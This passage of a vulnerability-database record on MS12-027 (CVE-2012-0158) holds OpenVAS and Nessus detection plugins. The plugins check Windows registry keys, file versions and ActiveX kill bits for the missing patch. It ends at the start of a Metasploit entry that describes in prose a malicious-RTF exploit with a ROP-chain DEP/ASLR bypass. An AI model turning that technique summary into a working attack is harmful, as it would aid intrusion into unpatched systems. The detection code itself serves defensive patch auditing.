value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 14:55:38 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 11:11:11 +0530 (Wed, 11 Apr 2012)\");\n script_name(\"Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/48786\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1026904\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms12-027\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nkey = \"\";\nver = \"\";\nkeys = \"\";\nitem = \"\";\npath = \"\";\nsysPath = \"\";\nbizName = \"\";\ndllVer = NULL;\nsysVer = NULL;\nexeVer = NULL;\n\n## Check for Windows OS\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(! sysPath){\n exit(0);\n}\n\n## Get Version from Mscomctl.Ocx file\nsysVer = fetch_file_version(sysPath, file_name:\"system32\\Mscomctl.Ocx\");\nif(! sysVer){\n exit(0);\n}\n\n## Check for Microsoft Office 2003, 2007 and 2010\nif(get_kb_item(\"MS/Office/Ver\") =~ \"^[11|12|14].*\")\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n## Check for Microsoft BizTalk Server 2002\nkey = \"SOFTWARE\\Microsoft\\BizTalk Server\\1.0\";\nif(registry_key_exists(key:key))\n{\n bizName = registry_get_sz(key:key, item:\"ProductName\");\n if(\"Microsoft BizTalk Server 2002\" >< bizName)\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for SQL Server 2005 and 2008\nforeach ver (make_list(\"2005\", \"10\"))\n{\n key = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\Uninstall\\Microsoft SQL Server \" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Microsoft Commerce Server 2002, 2007 or 2009\nkeys = make_list(\"SOFTWARE\\Microsoft\\Commerce Server\",\n \"SOFTWARE\\Microsoft\\Commerce Server 2007\",\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"+\n \"\\Microsoft Commerce Server 2009\");\nforeach key (keys)\n{\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Visual Basic 6.0\nkey = \"SOFTWARE\\Microsoft\\Visual Basic\\6.0\";\nif(registry_key_exists(key:key))\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n## Check for Visual FoxPro 8.0 and 9.0\nforeach ver (make_list(\"8.0\", \"9.0\"))\n{\n key = \"SOFTWARE\\Microsoft\\VisualFoxPro\\\" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Microsoft SQL Server 2000 Analysis Services\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000 Analysis Services\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n dllVer = fetch_file_version(sysPath:path, file_name:\"bin\\msmdctr80.dll\");\n if(dllVer)\n {\n if(version_is_less(version:dllVer, test_version:\"8.0.2302.0\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Microsoft SQL Server 2000\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n exeVer = fetch_file_version(sysPath:path, file_name:\"Binn\\sqlservr.exe\");\n if(exeVer)\n {\n ## Check for GDR and QFE versions\n if(version_is_less(version:exeVer, test_version:\"2000.80.2065.0\") ||\n version_in_range(version:exeVer, test_version:\"2000.80.2300.0\", test_version2:\"2000.80.2300.9\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-08T14:04:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0158"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.", "modified": "2020-01-07T00:00:00", "published": "2012-04-11T00:00:00", "id": "OPENVAS:1361412562310902829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902829", "type": "openvas", "title": "Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902829\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_bugtraq_id(52911);\n script_cve_id(\"CVE-2012-0158\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 11:11:11 +0530 (Wed, 11 Apr 2012)\");\n script_name(\"Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1026904\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to execute arbitrary code\n within the context of the application.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft SQL Server 2008\n\n - Microsoft Visual Basic 6.0\n\n - Microsoft Commerce Server 2009\n\n - Microsoft SQL Server 2005 Service Pack 4\n\n - Microsoft SQL Server 2000 Service Pack 4\n\n - Microsoft Visual FoxPro 9.0 Service Pack 2\n\n - Microsoft Visual FoxPro 8.0 Service Pack 1\n\n - Microsoft Commerce Server 2007 Service Pack 2\n\n - Microsoft Commerce Server 2002 Service Pack 4\n\n - Microsoft Office 2010 Service Pack 1 and prior\n\n - Microsoft Office 2007 Service Pack 3 and prior\n\n - Microsoft Office 2003 Service Pack 3 and prior\n\n - Microsoft SQL Server 2000 Analysis Services Service Pack 4\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error within the ListView, ListView2, TreeView\n and TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls and can\n be exploited to corrupt memory.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mscomctl.Ocx\");\nif(!sysVer){\n exit(0);\n}\n\nofficeVer = get_kb_item(\"MS/Office/Ver\");\n\nif(officeVer && officeVer =~ \"^1[124]\\.\")\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\BizTalk Server\\1.0\";\nif(registry_key_exists(key:key))\n{\n bizName = registry_get_sz(key:key, item:\"ProductName\");\n if(\"Microsoft BizTalk Server 2002\" >< bizName)\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nforeach ver (make_list(\"2005\", \"10\"))\n{\n key = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\Uninstall\\Microsoft SQL Server \" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkeys = make_list(\"SOFTWARE\\Microsoft\\Commerce Server\",\n \"SOFTWARE\\Microsoft\\Commerce Server 2007\",\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"+\n \"\\Microsoft Commerce Server 2009\");\nforeach key (keys)\n{\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\Visual Basic\\6.0\";\nif(registry_key_exists(key:key))\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\nforeach ver (make_list(\"8.0\", \"9.0\"))\n{\n key = \"SOFTWARE\\Microsoft\\VisualFoxPro\\\" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000 Analysis Services\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n dllVer = fetch_file_version(sysPath:path, file_name:\"bin\\msmdctr80.dll\");\n if(dllVer)\n {\n if(version_is_less(version:dllVer, test_version:\"8.0.2302.0\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n exeVer = fetch_file_version(sysPath:path, file_name:\"Binn\\sqlservr.exe\");\n if(exeVer)\n {\n if(version_is_less(version:exeVer, test_version:\"2000.80.2065.0\") ||\n version_in_range(version:exeVer, test_version:\"2000.80.2300.0\", test_version2:\"2000.80.2300.9\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-05-01T03:30:44", "description": "A memory corruption issue exists in Windows common controls,\nspecifically within the MSCOMCTL.TreeView, MSCOMCTL.ListView2,\nMSCOMCTL.TreeView2, and MSCOMCTL.ListView controls component of\nMSCOMCTL.OCX, due to improper sanitization of user-supplied input. An\nunauthenticated, remote attacker can exploit this issue by convincing\na user to view a specially crafted web page, resulting in the\nexecution of arbitrary code.", "edition": 32, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2012-04-11T00:00:00", "title": "MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2664258)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0158"], "modified": "2021-05-02T00:00:00", "cpe": ["cpe:/a:microsoft:visual_basic", "cpe:/a:microsoft:visual_foxpro", "cpe:/a:microsoft:office", "cpe:/a:microsoft:office_web_components", "cpe:/a:microsoft:biztalk_server", "cpe:/a:microsoft:commerce_server", "cpe:/a:microsoft:sql_server"], "id": "SMB_NT_MS12-027.NASL", "href": "https://www.tenable.com/plugins/nessus/58659", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58659);\n script_version(\"1.35\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-0158\");\n script_bugtraq_id(52911);\n script_xref(name:\"EDB-ID\", value:\"18780\");\n script_xref(name:\"MSFT\", value:\"MS12-027\");\n script_xref(name:\"MSKB\", value:\"983807\");\n script_xref(name:\"MSKB\", value:\"983808\");\n script_xref(name:\"MSKB\", value:\"983809\");\n script_xref(name:\"MSKB\", value:\"2597112\");\n script_xref(name:\"MSKB\", value:\"2598039\");\n script_xref(name:\"MSKB\", value:\"2598041\");\n script_xref(name:\"MSKB\", value:\"2641426\");\n script_xref(name:\"MSKB\", value:\"2645025\");\n script_xref(name:\"MSKB\", value:\"2647488\");\n script_xref(name:\"MSKB\", value:\"2647490\");\n script_xref(name:\"MSKB\", value:\"2655547\");\n script_xref(name:\"MSKB\", value:\"2658674\");\n script_xref(name:\"MSKB\", value:\"2658676\");\n script_xref(name:\"MSKB\", value:\"2658677\");\n\n script_name(english:\"MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2664258)\");\n script_summary(english:\"Checks for kill bit.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A memory corruption issue exists in Windows common controls,\nspecifically within the MSCOMCTL.TreeView, MSCOMCTL.ListView2,\nMSCOMCTL.TreeView2, and MSCOMCTL.ListView controls component of\nMSCOMCTL.OCX, due to improper sanitization of user-supplied input. An\nunauthenticated, remote attacker can exploit this issue by convincing\na user to view a specially crafted web page, resulting in the\nexecution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-027\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Office 2003, 2007 and\n2010; Office 2003 Web Components; SQL Server 2000, 2005, 2005 Express\nEdition, 2008, and 2008 R2; BizTalk Server 2002; Commerce Server 2002,\n2007, 2009, and 2009 R2; Microsoft Visual FoxPro 8.0 and 9.0; and\nVisual Basic 6.0 Runtime.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS12-027 MSCOMCTL ActiveX Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office_web_components\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sql_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visual_basic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visual_foxpro\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:biztalk_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:commerce_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\n \"smb_hotfixes.nasl\",\n \"ms_bulletin_checks_possible.nasl\",\n \"mssql_version.nasl\",\n \"commerce_server_installed.nasl\",\n \"biztalk_server_installed.nasl\",\n \"foxpro_installed.nasl\",\n \"office_installed.nasl\"\n );\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_activex_func.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS12-027';\nkbs = make_list(\n '983807',\n '983808',\n '983809',\n '2597112',\n '2598039',\n '2598041',\n '2641426',\n '2645025',\n '2647488',\n '2647490',\n '2655547',\n '2658674',\n '2658676',\n '2658677'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Uninstall/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, 'activex_init');\n\nclsids = make_list(\n '{bdd1f04b-858b-11d1-b16a-00c0f0283628}',\n '{996BF5E0-8044-4650-ADEB-0B013914E99C}',\n '{C74190B6-8589-11d1-B16A-00C0F0283628}',\n '{9181DC5F-E07D-418A-ACA6-8EEA1ECB8E9E}'\n);\n\nactivex_report = NULL;\nvuln = 0;\n\nforeach clsid (clsids)\n{\n # Make sure the control is installed\n file = activex_get_filename(clsid:clsid);\n if (isnull(file) || !file) continue;\n\n # Get its version\n version = activex_get_fileversion(clsid:clsid);\n if (!version) version = 'unknown';\n\n if ((version != 'unknown' && ver_compare(ver:version, fix:'6.1.98.33') < 0) && activex_get_killbit(clsid:clsid) == 0)\n {\n vuln++;\n if (!isnull(activex_report)) activex_report += '\\n';\n activex_report +=\n '\\n Class identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version;\n }\n}\n\nactivex_end();\n\nanalysis_svcs_installed = !isnull(get_kb_item('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Microsoft SQL Server 2000 Analysis Services/DisplayName'));\nsql_ver_list = get_kb_list(\"mssql/installs/*/SQLVersion\");\nanalysispath = NULL;\nvfp8_installed = !isnull(get_kb_item('SMB/VFP8.0/path'));\nvfp9_installed = !isnull(get_kb_item('SMB/VFP9.0/path'));\ncommerce_edition = get_kb_item('SMB/commerce_server/productname');\nvb6_installed = FALSE;\noffice_version = hotfix_check_office_version();\nowc2003_installed = FALSE;\n\nbiztalk_editions = make_list();\nbiztalk_installs = get_installs(app_name:\"BizTalk Server\");\nif (!empty_or_null(biztalk_installs[1]))\n{\n foreach biztalk_install (biztalk_installs[1])\n biztalk_editions = make_list(biztalk_editions, biztalk_install['Product Name']);\n}\n\nuninst_array = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\nforeach item (keys(uninst_array))\n{\n name = uninst_array[item];\n\n if (name == 'Microsoft Office 2003 Web Components')\n {\n # determine if this is an 11.x or a 12.x\n ver_key = item - \"DisplayName\";\n ver_key += \"DisplayVersion\";\n owc_ver = get_kb_item_or_exit(ver_key);\n\n if (\n # OWC 2003 SP3 (11.0.8173.0)\n owc_ver =~ \"^11\\.\" &&\n ver_compare(ver:owc_ver, fix:'11.0.8173.0', strict:FALSE) >= 0\n )\n owc2003_installed = TRUE;\n else if (\n # OWC 2003 for 2007 SP2 (12.0.6425.1000)\n # OWC 2003 for 2007 SP3 (12.0.6607.1000); note this\n # branch is vuln and there's no need for an upper\n # boundary until (and if) an SP4 is released.\n owc_ver =~ \"^12\\.\" &&\n ver_compare(ver:owc_ver, fix:'12.0.6425.1000', strict:FALSE) >= 0\n )\n owc2003_for_office2007_installed = TRUE;\n\n break;\n }\n}\n\nif (vuln > 0 || analysis_svcs_installed)\n{\n registry_init();\n hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n # If the ActiveX stuff looks unpatched, try to determine which KBs are missing\n if (vuln > 0)\n {\n if (!isnull(get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Setup\\Microsoft Visual Basic\\ProductDir\")))\n vb6_installed = TRUE;\n }\n\n # determine if 32 or 64-bit office is installed. this value is reportedly whenever office 2010 is installed, even if outlook is not installed\n if (office_version['14.0'])\n office_bitness = get_registry_value(handle:hklm, item:\"Software\\Microsoft\\Office\\14.0\\Outlook\\Bitness\");\n\n # get the SQL Server 200 Analysis Services path if it looks like it's installed\n if (analysis_svcs_installed)\n {\n analysispath = get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL Server 2000 Analysis Services\\InstallLocation\");\n\n if (analysispath)\n analysispath += \"\\bin\";\n }\n\n RegCloseKey(handle:hklm);\n close_registry();\n}\n\nprod_info = NULL;\n\nif (vuln)\n{\n activex_report = 'The following vulnerable controls do not have the kill bit set :\\n' + activex_report;\n prod_info = NULL;\n\n if (office_version['11.0'] || owc2003_installed)\n {\n flag = TRUE;\n if (office_version['11.0'])\n {\n sp = get_kb_item(\"SMB/Office/2003/SP\");\n if (!isnull(sp) && sp < 3) flag = FALSE; # < SP3 not reported\n }\n\n if (flag)\n {\n # KB923618 is Office 2003 SP3. KB2597112 will fail to install unless it's present, though it\n # doesn't make it clear that the failure is due to a lack of SP3\n prod_info +=\n '\\n\\nProduct : Office 2003 / Office 2003 Web components' +\n '\\nMissing update : KB2597112 (prerequisite: KB923618)';\n hotfix_add_report(bulletin:bulletin, kb:'2597112');\n }\n }\n if (office_version['12.0'] || owc2003_for_office2007_installed)\n {\n # If Office 2003 Web Components is ver. 12.x a different KB applies\n prod_info +=\n '\\n\\nProduct : Office 2007 / Office 2003 Web Components' +\n '\\nMissing update : KB2598041 (prerequisite: KB937961)';\n hotfix_add_report(bulletin:bulletin, kb:'2598041');\n }\n if (office_version['14.0'] && office_bitness != 'x64')\n {\n prod_info +=\n '\\n\\nProduct : Office 2010' +\n '\\nMissing update : KB2598039';\n hotfix_add_report(bulletin:bulletin, kb:'2598039');\n }\n if (vfp8_installed)\n {\n prod_info +=\n '\\n\\nProduct : Visual FoxPro 8.0' +\n '\\nMissing update : KB2647488';\n hotfix_add_report(bulletin:bulletin, kb:'2647488');\n }\n if (vfp9_installed)\n {\n prod_info +=\n '\\n\\nProduct : Visual FoxPro 9.0' +\n '\\nMissing update : KB2647490';\n hotfix_add_report(bulletin:bulletin, kb:'2647490');\n }\n if (vb6_installed)\n {\n # KB290887 is VB 6.0 Runtime SP6\n prod_info +=\n '\\n\\nProduct : Visual Basic 6.0 Runtime' +\n '\\nMissing update : KB2641426 (prerequisite: KB290887)';\n hotfix_add_report(bulletin:bulletin, kb:'2641426');\n }\n if ('2009 R2' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2009 R2' +\n '\\nMissing update : KB2658676';\n hotfix_add_report(bulletin:bulletin, kb:'2658676');\n }\n else if ('2009' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2009' +\n '\\nMissing update : KB2655547';\n hotfix_add_report(bulletin:bulletin, kb:'2655547');\n }\n if ('2007' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2007' +\n '\\nMissing update : KB2658677';\n hotfix_add_report(bulletin:bulletin, kb:'2658677');\n }\n if ('2002' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2002' +\n '\\nMissing update : KB2658674';\n hotfix_add_report(bulletin:bulletin, kb:'2658674');\n }\n if (max_index(biztalk_editions) > 0)\n {\n foreach biztalk_edition (biztalk_editions)\n {\n if ('2002' >< biztalk_edition)\n {\n prod_info +=\n '\\n\\nProduct : BizTalk Server 2002' +\n '\\nMissing update : KB2645025';\n hotfix_add_report(bulletin:bulletin, kb:'2645025');\n }\n }\n }\n}\n\n# the only other things to check are sql server 2000 and sql server 2000 analysis services.\n# if neither are installed and the activex stuff is not vulnerable, there's no need to do any further testing\nif (vuln == 0 && isnull(analysispath) && isnull(sql_ver_list)) exit(0, 'The host is not affected.');\n\nif (!is_accessible_share()) exit(1, 'is_accessible_share() failed.');\n\n# SQL Server 2000 Analysis Services\nif (\n analysispath &&\n hotfix_is_vulnerable(path:analysispath, file:\"Msmdadin.dll\", version:\"8.0.0.2302\", min_version:\"8.0.0.0\", bulletin:bulletin, kb:\"983807\")\n)\n{\n vuln++;\n\n if (!isnull(activex_report))\n {\n prod_info +=\n '\\n\\nProduct : SQL Server 2000 Analysis Services' +\n '\\nMissing update : KB983807';\n }\n}\n\nforeach item (keys(sql_ver_list))\n{\n item -= 'mssql/installs/';\n item -= '/SQLVersion';\n sqlpath = item;\n\n share = hotfix_path2share(path:sqlpath);\n if (!is_accessible_share(share:share)) continue;\n\n # SQL Server 2000\n # GDR\n if (hotfix_is_vulnerable(path:sqlpath, file:\"Sqlservr.exe\", version:\"2000.80.2065.0\", min_version:\"2000.80.2000.0\", bulletin:bulletin, kb:\"983808\"))\n {\n vuln++;\n\n if (!isnull(activex_report))\n {\n prod_info +=\n '\\n\\nProduct : SQL Server 2000' +\n '\\nMissing update : KB983808';\n }\n }\n # QFE\n else if(hotfix_is_vulnerable(path:sqlpath, file:\"Sqlservr.exe\", version:\"2000.80.2301.0\", min_version:\"2000.80.2100.0\", bulletin:bulletin, kb:\"983809\"))\n {\n vuln++;\n\n if (!isnull(activex_report))\n {\n prod_info +=\n '\\n\\nProduct : SQL Server 2000' +\n '\\nMissing update : KB983809';\n }\n }\n}\n\nif (vuln)\n{\n if (isnull(prod_info)) exit(0, \"None of the Microsoft KBs applies even though at least one of the controls is in use, possibly from a third-party application.\");\n\n if (!isnull(activex_report))\n {\n activex_report +=\n '\\n\\nNessus determined these controls are being used by the following applications :' +\n prod_info;\n\n if (hotfix_get_report())\n hotfix_add_report('\\n' + activex_report, bulletin:bulletin);\n else\n hotfix_add_report(activex_report, bulletin:bulletin);\n }\n\n set_kb_item(name:'SMB/Missing/' + bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:18:57", "description": "This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses \"msgr3en.dll\", which will load after office got load, so the malicious file must be loaded through \"File / Open\" to achieve exploitation.\n", "published": "2012-04-23T20:59:25", "type": "metasploit", "title": "MS12-027 MSCOMCTL ActiveX 